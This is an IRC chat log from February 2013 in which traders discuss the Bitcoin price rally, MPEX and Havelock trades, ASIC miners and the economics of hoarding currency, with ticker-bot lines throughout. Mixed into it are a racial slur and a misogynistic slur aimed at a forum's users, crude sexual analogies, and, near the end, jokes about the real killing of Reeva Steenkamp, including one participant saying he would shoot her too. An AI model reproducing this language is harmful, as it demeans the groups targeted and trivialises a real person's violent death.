hour high: 27.59690, 24 hour vwap: 25.32592 Feb 14 23:29:37 hmmm Feb 14 23:32:26 [MPEX] [S.MPOE] 3517 @ 0.00063744 = 2.2419 BTC [-] Feb 14 23:33:43 ok... Feb 14 23:33:51 so i went to suggest to netflix Feb 14 23:33:59 had to live chat cuz i couldn't find an email address Feb 14 23:34:05 he said they don't have one for suggestions Feb 14 23:34:13 but that he could relay my suggestion Feb 14 23:34:24 so i said my first suggestion is that you get an email address for suggestions Feb 14 23:34:35 second suggestion, accept bitcoins Feb 14 23:35:00 lol Feb 14 23:35:02 wrong order. Feb 14 23:35:03 nice Feb 14 23:35:36 lol Feb 14 23:35:47 well...i want to be able to try and get a bunch of people to email Feb 14 23:35:55 cuz getting them to chat with jason will be tougher Feb 14 23:35:57 lol Feb 14 23:36:10 this shit's so unreal. from 14 to 28 in a month ? Feb 14 23:36:13 srsly ? Feb 14 23:36:17 i had the time and thought this guy would be like wtf Feb 14 23:36:29 he was like, ah i haven't heard of that in a while Feb 14 23:36:30 it seems like every new leg up is met with a round of selling though. and it marches on... Feb 14 23:36:34 yep Feb 14 23:36:42 saw a great article on the rally Feb 14 23:36:42 mod6 yup Feb 14 23:36:49 jurov: the wall wasn't shopped, i saw it Feb 14 23:36:52 this cvan not but end up in tears. Feb 14 23:37:21 http://bitcoinmagazine.com/13-to-26-exploring-the-bitcoin-rally/ Feb 14 23:37:54 i dont think bitcoinmagazine links are allowed in here Feb 14 23:38:03 this time (i believe) it is based on greater adoption and publicity Feb 14 23:38:04 oops sorry Feb 14 23:38:18 did not realize that Feb 14 23:38:46 !help Feb 14 23:38:47 List of commands: Feb 14 23:38:48 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Feb 14 23:39:03 [MPEX] [S.MPOE] 21 @ 0.00063957 = 0.0134 BTC [+] Feb 14 23:39:09 [MPEX] [S.MPOE] 2353 @ 0.00064037 = 1.5068 BTC [+] Feb 14 23:39:11 [MPEX] [S.MPOE] 1000 @ 0.00064051 = 0.6405 BTC [+] Feb 14 23:39:12 [MPEX] [S.MPOE] 9326 @ 0.00064052 = 5.9735 BTC [+] Feb 14 23:39:31 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjr_ mjr__ mod6 molec Feb 14 23:39:34 mjr_ he's trolling you Feb 14 23:39:47 "Market prediction is a difficult thing; if it were easy, Bitcoin would have immediately jumped all the way to some final price back in 2009. Perhaps the best strategy for most of us is to simply wait and see." Feb 14 23:39:55 ironically... that's what apparently happened to s.mpoe. Feb 14 23:40:07 anyway, by any metric you choose, they are growing everywhere, blog mentions, google trends, SR users, SR items for sale, overall volume Feb 14 23:40:13 it went way up and since then it's been roughly stable Feb 14 23:40:24 lol yeah Feb 14 23:40:41 no one can predict and i don't even want to Feb 14 23:40:44 just going by how annoyed somethingbashful is tho... Feb 14 23:40:47 pretty funny. Feb 14 23:40:57 but i can see baseless tulip stuff vs growing interest Feb 14 23:41:04 " It's just a neat piece for people to talk about to feel tapped into the pulse of the Internet without actually having to do it. "You hear about that internet currency? Yeah it's pretty neat huh" and that's the end of it. It's just a filler piece, a blurb, not really a publicity piece. Feb 14 23:41:04 There's nothing actually newsworthy about bitcoin at this point except in drug law and so on. Drugs aren't really "in" right now in the news cycle. Now, if someone started selling unregistered guns with extended magazines using bitcoin. . ." Feb 14 23:41:13 bitcoin isn't really happening volume 349578349 Feb 14 23:41:43 is that counting other exchanges and coinbase? Feb 14 23:41:44 "When this bubble bursts it won't be newsworthy because nothing of importance will be lost. There will be a few articles on Gawker or whatever but nobody will really report on this. Bitcoin will die slowly, fading into obscurity as the last true believer tries to tell his son with his dying breath "there's always money in the bitcoin shack," not realizing his son mothballed that loving shack years ago because it was st Feb 14 23:41:44 upid makework and the solar panels powering it could be used for something fruitful." Feb 14 23:41:50 sweet sweet tears lol Feb 14 23:42:05 hahahaha Feb 14 23:42:39 i mean, changing the world and the financial systems, giving people a more democratic method of payment, giving them power...that is all well and good...i really just want to see SA cry Feb 14 23:43:23 [MPEX] [S.MPOE] 4321 @ 0.00064049 = 2.7676 BTC [-] Feb 14 23:43:24 [MPEX] [S.MPOE] 4321 @ 0.0006405 = 2.7676 BTC [+] Feb 14 23:43:25 [MPEX] [S.MPOE] 6125 @ 0.00064052 = 3.9232 BTC [+] Feb 14 23:43:27 [MPEX] [S.MPOE] 11400 @ 0.00064108 = 7.3083 BTC [+] Feb 14 23:43:29 [MPEX] [S.MPOE] 6380 @ 0.00064182 = 4.0948 BTC [+] Feb 14 23:43:30 [MPEX] [S.MPOE] 4553 @ 0.00064311 = 2.9281 BTC [+] Feb 14 23:43:39 it's their interwebs forum, they can cry if they want to . Feb 14 23:43:46 certainly better than mangosteencoin tho. Feb 14 23:43:51 which i think is the real problem here. Feb 14 23:44:35 "I really hope asicminer brings all their stuff online, takes control of the network and pushes all the other mining pools out of existence by increasing the difficulty beyond profitability for anyone without their own ASICs. People desert Bitcoin in droves, the price crashes and ASIC owners are left holding the bag of worthless Bitcoins and useless, expensive hardware." Feb 14 23:44:48 this was totally the best interwbs report so far. Feb 14 23:44:55 so full of butthurtcoin... Feb 14 23:45:31 yeah. these guys have epic amounts of butthurt. Feb 14 23:45:54 this is all stuff from SA huh? Feb 14 23:45:58 Someone did the math some minutes ago on the BFL chat how much a single Jalapeno would earn per day if everyone rolls out as intended and the difficulty matches that hashrate. Feb 14 23:45:58 It's "0.025152 - 0.037728" BTC per day. Yup, your 150$ device makes 4 to 6 cent a day (at pre bubble burst prices). Feb 14 23:46:02 also can not math any. Feb 14 23:46:25 which is somewhat not surprising, i guess they're mostly the liberal arts/community college folks with a lot of debt and degrees in whore/nigger studies right ? Feb 14 23:46:38 yeah Feb 14 23:48:03 [HAVELOCK] [SDICE] 4 @ 0.74 = 2.96 BTC [+] Feb 14 23:48:10 lol Feb 14 23:48:30 they are only going to have half the hashing power of the avalons Feb 14 23:48:49 if indeed avalon delivers anything eventually then its kinda perfect that asicminer came online first Feb 14 23:48:59 25 + 12 + 18 best way for this to play out Feb 14 23:49:01 avalon has been online Feb 14 23:49:07 2 of them Feb 14 23:49:12 i saw one in person Feb 14 23:49:22 nah, they sent like 60 units which are awol/possibly confiscated/stuck in customs/who knows Feb 14 23:49:26 watched it hash, (well not actually the bits, but it was on) Feb 14 23:49:30 and the rest are stuck in ny celebrations Feb 14 23:49:52 yeah the first batch is not "wild" yet Feb 14 23:50:00 but the 2 PoC are Feb 14 23:50:07 well yes Feb 14 23:50:23 will BFL ever deliver Feb 14 23:50:25 actually im kind of curious if inaba REALLY thinks he;ll be able to walk away from the eventual bfl blow up Feb 14 23:50:34 especially after what happened to buzz dave. Feb 14 23:51:29 do you know what exchange asicminer is going to be on? Feb 14 23:51:48 http://blockchain.info/pools Feb 14 23:52:00 it also seems the btc guild thing was judicious Feb 14 23:52:02 [HAVELOCK] [KCIM] 1 @ 0.999999 BTC [-] Feb 14 23:52:05 i wonder if the next 4th go to slush Feb 14 23:52:12 mjr_ they're developing their own last i heard. Feb 14 23:52:19 interesting Feb 14 23:52:32 when did those 23, 24, 25, 26 puts trade mircea_popescu Feb 14 23:52:52 yest and earlier. Feb 14 23:52:57 the forum is abuzz with commentary. Feb 14 23:53:25 https://forums.butterflylabs.com/bfl-forum-miscellaneous/952-new-account-page-website-shows-your-orders-11.html#post14508 that shit's pretty good. Feb 14 23:53:57 think idiff futures are a good call? Feb 14 23:54:58 mjr_ well... i dunno. Feb 14 23:55:32 kinda wide spread on them Feb 14 23:55:44 i imagine sooner or later someone competent - maybe a miner - will start mming them Feb 14 23:56:00 by the way Feb 14 23:56:09 at current price, we may have broken 300 mil Feb 14 23:56:18 280 using average which is around 25 Feb 14 23:56:36 think there is at least another 20 mil for $2.... Feb 14 23:56:39 ;;ticker Feb 14 23:56:40 BTCUSD ticker | Best bid: 26.95326, Best ask: 26.99997, Bid-ask spread: 0.04671, Last trade: 26.95326, 24 hour volume: 162515.40000499, 24 hour low: 21.72100, 24 hour high: 27.59690, 24 hour vwap: 25.34225 Feb 14 23:56:48 ;;calc 10.780*25.34225 Feb 14 23:56:49 273.189455 Feb 14 23:56:51 not yet Feb 14 23:57:03 what about the 20EUR/BTC mark? Feb 14 23:57:06 that's right here Feb 14 23:57:09 thaty's done Feb 14 23:57:12 no, not using vwap, using mt gox last i meant Feb 14 23:57:19 not official Feb 14 23:57:22 but getting there Feb 14 23:57:35 the euro's still around? jesus Feb 14 23:57:41 haha Feb 14 23:58:01 Lyspooner don't hate, i bought some homeless chicks pizzas with bitcoins like yest. Feb 14 23:58:29 some homeless chicks' pizzas more like it Feb 14 23:58:31 ruthless! Feb 14 23:58:46 well they claimed they were students but i dunno... Feb 14 23:58:59 fuck. i said with bitcoins Feb 14 23:59:03 I meant with EUROs Feb 14 23:59:09 jesus it's falling into irrelevancy. Feb 14 23:59:10 ahhh Feb 14 23:59:22 ok makes sense now Feb 14 23:59:22 yeah, think a few of them want out of the eurozone Feb 14 23:59:25 i was wondering if you used the pizza.itradebtc.com thingy Feb 14 23:59:35 no, i used a street vendor Feb 14 23:59:37 i did pizzaforbitcoins, it is worthless Feb 15 00:00:22 i'll tell you something definite, i'm getting about one person a day hitting me up about advice as to how to go into bitcoin business Feb 15 00:00:27 most people who aren't involved in btc Feb 15 00:00:31 so the word is surely spreading Feb 15 00:00:50 how *do* you go into bitcoin business? Feb 15 00:01:05 same as anything else, you let it ferment... Feb 15 00:01:23 [MPEX] [S.MPOE] 804 @ 0.00063744 = 0.5125 BTC [-] Feb 15 00:01:23 that's wine Feb 15 00:01:23 [MPEX] [S.MPOE] 8100 @ 0.00063717 = 5.1611 BTC [-] Feb 15 00:01:26 a sorry. Feb 15 00:01:26 [MPEX] [S.MPOE] 1004 @ 0.00063701 = 0.6396 BTC [-] Feb 15 00:01:27 [MPEX] [S.MPOE] 692 @ 0.000637 = 0.4408 BTC [-] Feb 15 00:01:37 you come up with an idea, you assemble a team, you start implementing it... Feb 15 00:04:32 yeah, unfortunately you still have to have an idea Feb 15 00:04:41 step 1: bitcoins Feb 15 00:04:45 step 2: ??? Feb 15 00:04:49 step 3: profit Feb 15 00:05:23 i feel like that is on at least a hundred VC's whiteboards right now Feb 15 00:06:26 step 2: evade local tax/gambling/trading laws somehow.. Feb 15 00:06:53 um, where do i assemble a team everyone is like, has to sustain wife and kids, paying mortgage and scared shitless Feb 15 00:07:08 of what i;m saying about mpex Feb 15 00:07:45 almost as if there was exactly one crazy fool like me on this rock Feb 15 00:08:24 You're alone, jurov. All alone. The rest is but an illusion. Feb 15 00:08:31 [MPEX] [S.MPOE] 4321 @ 0.00063719 = 2.7533 BTC [+] Feb 15 00:08:33 [MPEX] [S.MPOE] 12472 @ 0.000637 = 7.9447 BTC [-] Feb 15 00:08:35 go away you bot Feb 15 00:08:47 you go. Feb 15 00:11:44 So is everyone on the we're gonna be rich bandwagon or do people expect a bubble to pop at any moment by now? Feb 15 00:12:20 if there will be widespread adoption price has to go up Feb 15 00:12:24 that is a fact Feb 15 00:12:27 now go play around it Feb 15 00:12:36 namworld it's not about the price relative to fiat Feb 15 00:12:39 it's about replacing fiat Feb 15 00:12:52 bitcoin rich is all that matters Feb 15 00:13:01 well Feb 15 00:13:07 i agree that is the ultimate goal Feb 15 00:13:13 k cool then Feb 15 00:13:19 however, there will be quite a bit of time before we can pay rent in btc Feb 15 00:13:25 or our bosses will pay us in btc Feb 15 00:13:25 So everyone finds the current price rise normal? Feb 15 00:13:33 lol what is normal Feb 15 00:13:38 its insane Feb 15 00:13:47 but i think the adoption and publicity has exploded as fst Feb 15 00:14:10 my friend who owns a coffee shop in soho tentatively agreed to accept bitcoins Feb 15 00:14:24 pending implementation details etc Feb 15 00:14:40 by adoption, you mean people buying in on the hype or actual people buying because they need to spend bitcoins on a service/actually use bitcoins? Feb 15 00:14:47 both Feb 15 00:14:48 mjr_ go read http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/ Feb 15 00:17:57 cool article Feb 15 00:18:17 but i don't think it will be that quick Feb 15 00:18:26 again, you can't buy a new car, pay loans etc with btc Feb 15 00:18:32 so there will always be room for exchange Feb 15 00:18:35 seems jurov is one step ahead of the curve Feb 15 00:18:45 fuck, you can't even get by in the world using only the dollar Feb 15 00:18:55 apple has to pay foxconn using yuan Feb 15 00:19:12 Lyspooner thing is even 1k btc makes you bitcoin rich Feb 15 00:19:22 exchange will always happen, price will rise Feb 15 00:19:29 but eventually stabilize at whatever the market decides Feb 15 00:19:56 if anyone, anyone at all, can tell me they do not use fiat at all for any reason, then i will be surprised Feb 15 00:19:58 mircea_popescu yes, i agree. people should strive to get 1000 BTC if they don't have it already Feb 15 00:20:11 indeed. Feb 15 00:20:21 there's no going to be more than like 20k of those Feb 15 00:20:41 which if you think about it... being in the top 20k ppl is pretty much being very rich Feb 15 00:21:26 very true Feb 15 00:21:31 but take my friends coffee shop Feb 15 00:21:38 mjr_ are you familiar with that theory of investing whereby early on in your investing life you should never sell assets, to avoid the spreads, but simply buy something else and change portofolio that way ? Feb 15 00:21:38 he can peg the cost in btc to the dollar Feb 15 00:21:57 seems familiar Feb 15 00:22:00 okay. Feb 15 00:22:08 that's good advice since you set the spreads ;) Feb 15 00:22:09 but you can market make Feb 15 00:22:13 from my pov i am simply conserving btc portofolio and using my fiat assets to discharge all obligations Feb 15 00:22:20 yeah Feb 15 00:22:22 on the net this reduces my fiat footprint over time. Feb 15 00:22:33 very true and that is the way to go, if you have a lot of btc Feb 15 00:22:34 so in a sense, albeit very synthetically, i am paying for everyting in bitcoin Feb 15 00:22:45 many (most) don't have as many as you Feb 15 00:23:13 and eventually...paper money needs to be spent or it is really worthless Feb 15 00:23:20 right. Feb 15 00:23:28 so either you buy a coffee using your bitcoins Feb 15 00:23:33 releasing them into the supply Feb 15 00:23:36 gersham's law still hasn't been repealed. Feb 15 00:23:46 or you exchange and then buy the coffee releasing them into the supply Feb 15 00:23:48 *gresham Feb 15 00:23:57 assuming you drink coffee Feb 15 00:23:58 ty lypsooner! Feb 15 00:24:34 my point being, if you run out of cash, you still must spend somewhat Feb 15 00:24:39 and you will spend btc Feb 15 00:24:54 if everyone could hoard all their assets forever, everyone might do that, but life costs money Feb 15 00:25:18 [MPEX] [S.MPOE] 1197 @ 0.00064311 = 0.7698 BTC [+] Feb 15 00:25:20 [MPEX] [S.MPOE] 4321 @ 0.00064541 = 2.7888 BTC [+] Feb 15 00:25:21 [MPEX] [S.MPOE] 7300 @ 0.00064542 = 4.7116 BTC [+] Feb 15 00:25:23 [MPEX] [S.MPOE] 7482 @ 0.00065194 = 4.8778 BTC [+] Feb 15 00:25:43 so, i think the two are mutually dependant Feb 15 00:25:50 i think by 2100 or so i'll be out of fiat assets Feb 15 00:25:51 if no one can buy or sell with bitcoins, their value drops Feb 15 00:25:56 LOL Feb 15 00:25:57 by then i guess spending btc may well be safe Feb 15 00:26:25 my point is that the transition can be done whereby you generate revenue in btc and spend btc Feb 15 00:26:31 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.04105003 = 41.05 BTC [-] Feb 15 00:26:32 if no one can buy or sell with bitcoins, their value drops << this is absolute nonsebnse. Feb 15 00:26:42 all through the history, when silver was overpriced by fiat, gold was hoarded Feb 15 00:26:44 ok...if there is absolutely no trade in bitcoins Feb 15 00:26:51 in all those instances people had the option to pay in gold Feb 15 00:26:54 they never exercised it Feb 15 00:26:57 ie. i cannot spend my bitcoins or gain something from them Feb 15 00:26:58 that DID NOT drop the price of gold Feb 15 00:27:13 yes, but gold had a *little* more history Feb 15 00:27:19 so ? Feb 15 00:27:20 and was not trying to prove itself Feb 15 00:27:29 this is like saying you like this chick because she has more history. Feb 15 00:27:31 i never heard that 1. Feb 15 00:27:32 so with no adoption, everyone just goes back to using fiat Feb 15 00:27:51 i can't buy from you using btc, i can't sell to you for btc Feb 15 00:27:58 ok, to me btc doesn't exist Feb 15 00:28:02 you have paper profits Feb 15 00:28:02 you could, you just don't want to. Feb 15 00:28:04 lol, gonna fund some research to be able to stay here till 2100 Feb 15 00:28:14 ok, so my point is you *could* Feb 15 00:28:22 if you don't, you cease trade Feb 15 00:28:29 if you do, you release bitcoins back into the economy Feb 15 00:28:45 ie. if japan hoarded yen, we couldn't buy there shit Feb 15 00:28:50 their* Feb 15 00:29:00 [MPEX] [S.MPOE] 4321 @ 0.00065186 = 2.8167 BTC [-] Feb 15 00:29:02 so the yen falls in value since everyone stops caring Feb 15 00:29:02 [MPEX] [S.MPOE] 1279 @ 0.00065194 = 0.8338 BTC [+] Feb 15 00:29:07 and writes them off as part of the economy Feb 15 00:29:24 that's not how things work. Feb 15 00:29:25 when liquidity is very low, pricing assets becomes very hard Feb 15 00:29:39 with 0 liquidity, it becomes impossible Feb 15 00:29:53 did you read the above about gold ? Feb 15 00:30:01 ie. what price is someone willing to pay, i don't know because i am not willing to sell *at any price* Feb 15 00:30:03 [HAVELOCK] [SDICE] 10 @ 0.74449999 = 7.445 BTC [+] Feb 15 00:30:06 it wasn't at all impossible to price anything, even tho gold liquidity was 0 Feb 15 00:30:11 because silver liquidity acted as a proxy Feb 15 00:30:13 it was never 0 Feb 15 00:30:16 ah ok Feb 15 00:30:17 true Feb 15 00:30:21 this is how this works Feb 15 00:30:24 and there are other crypto currencies Feb 15 00:30:29 even if not a single bitcoin is used to DIRECTLY buy services Feb 15 00:30:32 fiat proxyes it Feb 15 00:30:43 in fact, litecoin was meant to be the silver Feb 15 00:30:53 that is possible too, but only if people want to Feb 15 00:30:58 you could use fiat to proxy it Feb 15 00:31:15 my point is simply this Feb 15 00:31:32 if every seller refused to part with their bitcoins at any price Feb 15 00:31:42 people would move on Feb 15 00:31:53 something like, if women refused to suck cock no matter what Feb 15 00:31:54 at this point right now i mean Feb 15 00:31:56 people'd stop having sex. Feb 15 00:31:58 that ? Feb 15 00:32:01 [MPEX] [S.MPOE] 14750 @ 0.00065194 = 9.6161 BTC [+] Feb 15 00:32:35 if every woman refused to have sex, yes there would be no more sex barring rape Feb 15 00:32:39 aha. Feb 15 00:32:42 so then, there's your answer. Feb 15 00:32:51 if holders refused to part with their btc at any price Feb 15 00:32:53 ah, you are saying people will forcibly take your bitcoins? Feb 15 00:32:57 then likely most fiat would go into stealing bitcoins. Feb 15 00:32:58 that is my point Feb 15 00:33:22 my point is that if i said i refuse to part with my dollars for anything in return Feb 15 00:33:28 what use would my dollars be? Feb 15 00:33:34 i can't eat Feb 15 00:33:34 same as always. Feb 15 00:33:47 there is no amount of food i would take in compensation for my dollar Feb 15 00:33:52 no service Feb 15 00:33:53 the use of your dollars is not a function of what you do or don't do. Feb 15 00:33:58 that's why they're dollars. Feb 15 00:34:17 my point is that money that can't/won't be spent is worthless Feb 15 00:34:31 ya, i get that, but it happens to be wrong. Feb 15 00:34:38 if you say so Feb 15 00:34:41 people are easily seduced by this "we the people" Feb 15 00:34:47 no Feb 15 00:34:48 it's not the will of the people that enacts the value of currency. Feb 15 00:34:58 i'm saying, in order to get something, i spend money Feb 15 00:35:02 that is how a market works Feb 15 00:35:09 if you refuse to trade, there is no market Feb 15 00:35:17 hence you get nothing Feb 15 00:35:29 nah. Feb 15 00:35:32 you get courted. Feb 15 00:35:39 i said at any price Feb 15 00:35:42 yeah. Feb 15 00:35:45 you still get courted. Feb 15 00:35:48 so they can offer whatever they want Feb 15 00:35:51 you would say no Feb 15 00:35:55 what, you think people don't wolfwhistle the girl who wants to be a nun ? Feb 15 00:35:56 and then starve to death Feb 15 00:36:18 !help Feb 15 00:36:19 List of commands: Feb 15 00:36:20 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Feb 15 00:36:26 what you are saying is..."i can spend no resources and yet get everything i need" Feb 15 00:36:33 [MPEX] [S.MPOE] 4321 @ 0.00063726 = 2.7536 BTC [-] Feb 15 00:36:35 [MPEX] [S.MPOE] 26979 @ 0.00063701 = 17.1859 BTC [-] Feb 15 00:36:37 sounds like a free lunch to me Feb 15 00:36:49 no, im just sayingthat the value of my resources isn't a function of what i do or not do. Feb 15 00:36:59 ok, you are entitled to value them however you want Feb 15 00:37:03 not me. Feb 15 00:37:15 unless that "value" is activated through a market, it doesn't matter Feb 15 00:37:16 teh invisible abaccus. Feb 15 00:37:28 a "market" doesn't have to mean what you think it means. Feb 15 00:37:36 there's a market even if nobody is trading anything. Feb 15 00:37:44 i suppose Feb 15 00:37:56 my point is, are you saying people will give you something for nothing in return? Feb 15 00:38:01 prolly not. Feb 15 00:38:06 ok Feb 15 00:38:13 well, me, prolly they will cause im cool and all. but as a general rule no Feb 15 00:38:13 so we agree Feb 15 00:38:17 [BTCTC] [B.YABMC] 30 @ 0.02369 = 0.7107 BTC [+] Feb 15 00:38:18 hehehe Feb 15 00:38:20 good point Feb 15 00:38:33 so my point is that you will have to give something up to get something Feb 15 00:38:37 doesn't have to be btc Feb 15 00:38:40 but it would have to be something Feb 15 00:38:41 okay Feb 15 00:38:51 if all you have is btc and your 24 hours a day Feb 15 00:38:59 you can work.... Feb 15 00:39:02 that's fine Feb 15 00:39:10 but to me defeats the purpose of building up wealth Feb 15 00:39:22 ok, so you spend some btc then Feb 15 00:39:23 so i can work to feed myself Feb 15 00:39:29 ok, so now btc is flowing Feb 15 00:39:32 very expensive Feb 15 00:39:44 but still...satoshi's are now worth $100 Feb 15 00:39:56 and the market keeps working Feb 15 00:40:08 this is like the story of midas lol Feb 15 00:40:16 lol Feb 15 00:40:21 what if everything you touched turned to gold Feb 15 00:40:31 you would die the richest person in the world Feb 15 00:40:56 it's funny that few actually remember the moral of that story Feb 15 00:41:03 which is that midas was cursed Feb 15 00:41:16 and hated life Feb 15 00:41:32 because he was alone and couldn't touch anyone, or eat anything, classic greek god punishment Feb 15 00:42:11 cool story Feb 15 00:42:18 if i remember correctly, he killed his daughter by touching her Feb 15 00:42:35 imagine the midas asicminer Feb 15 00:42:40 hahaha Feb 15 00:42:43 yes Feb 15 00:42:43 it does 15th/s and uses no power Feb 15 00:42:44 but... Feb 15 00:42:55 if you plug it in it turns your computer to worthless gold!!! Feb 15 00:43:01 hahahahaa Feb 15 00:43:16 could you make a gold computer? Feb 15 00:43:21 nah Feb 15 00:43:23 i think you could...it is conductive... Feb 15 00:43:26 nah you are right Feb 15 00:43:27 semiconductors require semiconductance Feb 15 00:43:30 no substrate for the chips Feb 15 00:43:51 you could make a mechanical computer i suppose but would be quite slow Feb 15 00:44:00 in fact computers are an item that can not be made of any single material Feb 15 00:44:01 need 2 Feb 15 00:44:15 http://i.imgur.com/tbEQR4g.jpg Feb 15 00:44:30 haha Feb 15 00:44:33 good point Feb 15 00:44:36 babbage's machine Feb 15 00:44:36 [MPEX] [S.MPOE] 1461 @ 0.00065194 = 0.9525 BTC [+] Feb 15 00:44:37 [MPEX] [S.MPOE] 4321 @ 0.00065325 = 2.8227 BTC [+] Feb 15 00:44:39 [MPEX] [S.MPOE] 8200 @ 0.00065326 = 5.3567 BTC [+] Feb 15 00:44:41 [MPEX] [S.MPOE] 4693 @ 0.00065356 = 3.0672 BTC [+] Feb 15 00:45:07 an otter! :D Feb 15 00:45:19 the bashies continue to deliver! Feb 15 00:45:21 "I went through the shoutbox archives and it turns out that engineer has been trying to figure out how their boundary scan tester works unsuccessfully for 3 straight days now. You kinda need that thing to figure out if the chips work correctly and if they don't why they don't work correctly." Feb 15 00:45:27 this apparently culled from bfl shoutbox. Feb 15 00:45:30 well someone linked this the other day i think http://www.citizen-citizen.com/collections/all/products/gold-pills Feb 15 00:45:46 [MPEX] [S.MPOE] 307 @ 0.00065356 = 0.2006 BTC [+] Feb 15 00:45:48 [MPEX] [S.MPOE] 11293 @ 0.00065357 = 7.3808 BTC [+] Feb 15 00:46:01 online story mambo #5 Feb 15 00:46:03 seems legit Feb 15 00:46:55 anyway, see you guys later tonight Feb 15 00:46:58 i'm off to the bar Feb 15 00:47:00 :) Feb 15 00:47:54 are we still going up? Feb 15 00:48:01 This is not going to end well... Feb 15 00:48:32 ;;ticker Feb 15 00:48:32 BTCUSD ticker | Best bid: 27.00244, Best ask: 27.02134, Bid-ask spread: 0.01890, Last trade: 27.00244, 24 hour volume: 159173.80620676, 24 hour low: 21.72100, 24 hour high: 27.59690, 24 hour vwap: 25.36964 Feb 15 00:48:40 bout same Feb 15 00:52:04 just watching TPB AFK.. interesting Feb 15 00:53:05 lol they speak my soul "i wanted to play with things i could never afford on my own" Feb 15 00:55:07 there's a theory floating around that the recent runup may have had something to do with Reddit insiders doing a little speculating before todays announcement. Feb 15 00:55:38 i have a theory about that theory Feb 15 00:56:28 heheh… just some fun speculatin' Feb 15 00:56:56 redditors don't have that kind of dough Feb 15 00:57:04 http://m.theglobeandmail.com/sports/more-sports/pistorius-nike-ad-i-am-the-bullet-pulled-from-local-television/article8665278/?service=mobile Feb 15 00:57:09 poor taste Feb 15 00:57:44 [MPEX] [S.MPOE] 507 @ 0.00065357 = 0.3314 BTC [+] Feb 15 01:06:37 [MPEX] [S.MPOE] 14600 @ 0.00065378 = 9.5452 BTC [+] Feb 15 01:08:10 [MPEX] [S.MPOE] 2550 @ 0.00065378 = 1.6671 BTC [+] Feb 15 01:14:43 300 btc bid at 0.006 on s.dice now Feb 15 01:15:45 why is that wow ? Feb 15 01:16:03 maximian since when do reddit insiders have money ? Feb 15 01:16:21 bah Lyspooner beat me to it Feb 15 01:16:32 not wow Feb 15 01:16:36 now Feb 15 01:16:48 mircea's watching porn again or something Feb 15 01:17:21 i misread :D Feb 15 01:17:36 so wait, "paralympian" is now a legitimate title ? Feb 15 01:17:40 i used to watch the bitcoin show with bruce wagner Feb 15 01:18:18 don't know if you saw the news mircea_popescu, but that legless man shot his hot girlfriend in the face this morning and killed her Feb 15 01:18:30 [MPEX] [S.MPOE] 1693 @ 0.00065378 = 1.1068 BTC [+] Feb 15 01:18:30 what the fuck is next, John Dork, fabled Sykrim Warlock ? Feb 15 01:18:32 and it looks like he doesn't have a leg to stand on Feb 15 01:18:41 it wasn't in my feed Feb 15 01:18:42 ahahaha Feb 15 01:18:52 ok that makes me half sorry i didn't see it. Feb 15 01:19:40 the rumor is that she wanted to give him a valentine's day surprise, and being a south african, he mistook her for an intruder and shot her face off Feb 15 01:19:59 ;;ticker Feb 15 01:20:00 BTCUSD ticker | Best bid: 27.19682, Best ask: 27.24900, Bid-ask spread: 0.05218, Last trade: 27.19682, 24 hour volume: 157796.67033685, 24 hour low: 21.72100, 24 hour high: 27.59690, 24 hour vwap: 25.37989 Feb 15 01:20:55 Lyspooner right. let me see here, he's a gimp and she's a trophy Feb 15 01:21:07 she wanted to do dp for valentine's and he mistook the two big guys for his wife Feb 15 01:22:44 http://static.guim.co.uk/sys-images/Guardian/Pix/pictures/2013/2/14/1360871599159/South-African-sprinter-Os-010.jpg nice. ducklips and everything. Feb 15 01:23:12 the dude was born without fibulae Feb 15 01:23:24 i'd shoot her in the face if that happened to me, too Feb 15 01:23:26 [MPEX] [S.MPOE] 4321 @ 0.00064918 = 2.8051 BTC [-] Feb 15 01:23:28 [MPEX] [S.MPOE] 10654 @ 0.00064917 = 6.9163 BTC [-] Feb 15 01:23:29 [MPEX] [S.MPOE] 7984 @ 0.000637 = 5.0858 BTC [-] Feb 15 01:23:36 The South African FHM model Feb 15 01:23:57 its incredible how ready to serve the prurient interest the web is. Feb 15 01:24:10 "PHOTOS: Reeva Steenkamp's modeling pictures " as an article insert Feb 15 01:27:14 [MPEX] [S.MPOE] 4321 @ 0.00063723 = 2.7535 BTC [+] Feb 15 01:27:16 [MPEX] [S.MPOE] 4321 @ 0.00063719 = 2.7533 BTC [-] Feb 15 01:27:16 [MPEX] [S.MPOE] 3908 @ 0.00063708 = 2.4897 BTC [-] Feb 15 01:37:55 [MPEX] [S.MPOE] 2107 @ 0.00065102 = 1.3717 BTC [+] Feb 15 01:37:56 [MPEX] [S.MPOE] 4321 @ 0.00065581 = 2.8338 BTC [+] Feb 15 01:37:58 [MPEX] [S.MPOE] 2472 @ 0.00065582 = 1.6212 BTC [+] Feb 15 01:49:26 ;;ticker Feb 15 01:49:26 [MPEX] [S.MPOE] 4321 @ 0.00065552 = 2.8325 BTC [-] Feb 15 01:49:26 BTCUSD ticker | Best bid: 27.23301, Best ask: 27.27116, Bid-ask spread: 0.03815, Last trade: 27.23300, 24 hour volume: 147220.28636604, 24 hour low: 21.72100, 24 hour high: 27.59690, 24 hour vwap: 25.44526 Feb 15 01:49:34 [MPEX] [S.MPOE] 4679 @ 0.00065582 = 3.0686 BTC [+] Feb 15 01:52:18 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.03984163 = 39.8416 BTC [-] Feb 15 01:54:13 Yeah, I sold two blocks of 1000 puts at a loss. I think I'll stop there. Feb 15 01:54:40 I want to try to get puts higher at the top... looks like we're still a bit far from the top Feb 15 01:56:04 Maybe get puts around 30 USD/BTC Feb 15 01:56:22 I think I should have waited for that instead. Feb 15 01:59:29 might be a bit risky... Feb 15 02:04:17 I wouldnt need a lawyer to register an llc, would I? Feb 15 02:05:02 [MPEX] [S.MPOE] 4321 @ 0.00065573 = 2.8334 BTC [-] Feb 15 02:05:04 no Feb 15 02:05:04 [MPEX] [S.MPOE] 7849 @ 0.00065582 = 5.1475 BTC [+] Feb 15 02:05:24 tho, it couldn't hurt Feb 15 02:05:24 [BTCTC] [BTC-BOND] 200 @ 0.01 = 2 BTC [+] Feb 15 02:06:16 Some people have trust in me, lending at 10.95% per year it seems. Feb 15 02:11:09 congrats.. they are not s.bvps shareholders, i guess. Feb 15 02:11:24 Diablo-D3 its prolly best to have someone else handle it Feb 15 02:11:36 in most places you need an agent of record anyway Feb 15 02:11:52 mircea_popescu: yes, but in maine it just has to be someone living here Feb 15 02:12:10 ya but as in all 